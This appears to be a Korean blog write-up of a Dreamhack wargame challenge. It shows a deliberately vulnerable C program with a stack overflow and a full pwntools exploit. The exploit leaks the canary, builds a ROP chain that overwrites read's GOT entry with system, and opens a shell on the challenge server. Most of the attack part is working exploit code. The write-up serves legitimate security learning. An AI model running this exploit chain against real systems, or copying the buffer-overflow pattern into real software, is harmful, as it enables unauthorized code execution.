해당 문제는 강의에 기반한 문제로, 자세한 풀이는 아래 주소를 참고하세요.
2022.07.02 - [Dreamhack/Lecture & Practice] - [Practice] ROP - GOT Overwrite
1. 실습 코드
// Name: rop.c
// Compile: gcc -o rop rop.c -fno-PIE -no-pie
#include <stdio.h>
#include <unistd.h>
int main() {
char buf[0x30];
setvbuf(stdin, 0, _IONBF, 0);
setvbuf(stdout, 0, _IONBF, 0);
// Leak canary
puts("[1] Leak Canary");
printf("Buf: ");
read(0, buf, 0x100);
printf("Buf: %s\n", buf);
// Do ROP
puts("[2] Input ROP payload");
printf("Buf: ");
read(0, buf, 0x100);
return 0;
}2. Exploit
- pwntool을 이용하여, exploit 코드를 작성해보면 아래와 같다.
from pwn import *
def print_v(name, value):
return success(":".join([name, hex(value)]))
p = remote("host3.dreamhack.games", 13192)
#p = process(b"./rop")
e = ELF(b"./rop")
libc = ELF("libc-2.27.so")
# Leak Canary
input1 = "A" * 0x39
p.sendafter("Buf: ", input1)
p.recvuntil(input1)
canary = u64(b'\x00' + p.recvn(7))
print_v("Canary", canary)
# Do RoP
pop_rdi = 0x4007f3
rsi_r15 = 0x4007f1
read_got = e.got['read']
read_plt = e.plt['read']
puts_plt = e.plt['puts']
read_lib = libc.symbols['read']
sys_lib = libc.symbols['system']
input2 = b"A" * 0x38
input2 += p64(canary)
input2 += b"B" * 0x8
input2 += p64(pop_rdi)
input2 += p64(read_got)
input2 += p64(puts_plt)
input2 += p64(pop_rdi) + p64(0)
input2 += p64(rsi_r15)
input2 += p64(read_got) + p64(0)
input2 += p64(read_plt)
input2 += p64(pop_rdi)
input2 += p64(read_got+8)
input2 += p64(read_plt)
p.sendafter("Buf: ", input2)
read = u64(p.recvn(6) + (b'\x00'*2))
print_v("Read Addr", read)
base_lib = read - read_lib
system = base_lib + sys_lib
print_v("Base Libc", base_lib)
print_v("System Addr", sys_lib)
p.send(p64(system)+b"/bin/sh\x00")
p.interactive()- shell을 통해, flag를 얻을 수 있다.
'Dreamhack > Wargame' 카테고리의 다른 글
| [Wargame] fho (0) | 2022.07.19 |
|---|---|
| [Wargame] basic_rop_x86 (0) | 2022.07.10 |
| [Wargame] basic_rop_x64 (0) | 2022.07.08 |
| [Wargame] Return to Library (0) | 2022.07.02 |
| [Wargame] ssp_001 (0) | 2022.06.26 |